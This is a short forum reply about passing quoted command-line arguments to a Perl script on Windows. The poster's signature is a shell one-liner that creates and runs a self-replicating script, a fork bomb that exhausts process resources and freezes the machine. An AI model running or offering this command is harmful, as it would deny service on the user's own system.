in reply to Is my @ARGV broken?

Update:
I just tried this:
D:\argv_test.pl "I like code" I like code D:\
So it only works with double quotes now?

ibanix

$ echo '$0 & $0 &' > foo; chmod a+x foo; foo;